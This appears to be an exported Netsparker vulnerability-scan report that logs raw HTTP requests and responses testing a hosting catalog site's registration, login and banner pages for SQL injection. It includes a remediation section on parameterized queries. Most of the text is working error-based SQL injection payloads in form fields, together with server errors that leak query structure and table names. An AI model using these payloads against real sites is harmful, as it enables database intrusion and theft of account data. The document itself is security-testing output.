POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 718 Accept-Encoding: gzip, deflate company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:20:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 699 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:22:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:0' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
temp_check
POST
755
user_login
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
password
POST
3
form_field
POST
1
5.0.77
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 323 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&password=3&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:29:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 383 Error #1062: Duplicate entry '_!@4dilemma:0' for key 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
temp_check
POST
755
user_login
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
password
POST
3
remember_both
POST
1
remember_mail
POST
1
form_field
POST
1
5.0.77
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 355 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&password=3&remember_both=1&remember_mail=1&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:35:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 383 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
temp_check
POST
755
user_login
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
password
POST
3
B1
POST
Login
form_field
POST
1
5.0.77
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 332 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&password=3&B1=Login&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:40:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 383 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' AND active NOT IN (2,3,4)
[Probable] SQL Injection
SQL Injection occurs when data input, for example by a user, is interpreted as a SQL command rather than as normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection here, it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is a SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, so that we can address it for next time and give you a more precise result.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attacks:
Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
See the remedy for solution.
If you are not using a database access layer (DAL) within the architecture, consider its benefits and implement one if appropriate. As a minimum, the use of a DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.
A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
Parameters
Parameter
Type
Value
id
GET
'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
Request
GET /banner.php?id='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:23:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 510 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '柡D!����b���io�a")́�~H�v7P"M�x7��Ķr�����1N:�@�' AND a.active = 0 ' at line 6 in SQL SELECT COUNT(b.banner_aff_id) FROM banner_aff AS b LEFT JOIN affiliate AS a USING(aff_id) WHERE b.hash_code='' AND b.banner_aff_id='�^�!�'柡D!����b���io�a")́�~H�v7P"M�x7��Ķr�����1N:�@�' AND a.active = 0 AND b.status = 'active'
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 670 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 651 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
Parameter
Type
Value
B1
POST
Login
form_field
POST
1
password
POST
3
remember_both
POST
1
remember_mail
POST
1
temp_check
POST
755
user_login
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 267 Accept-Encoding: gzip, deflate B1=Login&form_field=1&password=3&remember_both=1&remember_mail=1&temp_check=755&user_login='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:58:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 477 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
company_name
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 631 Accept-Encoding: gzip, deflate company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:16:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 612 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:18:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 648 Accept-Encoding: gzip, deflate 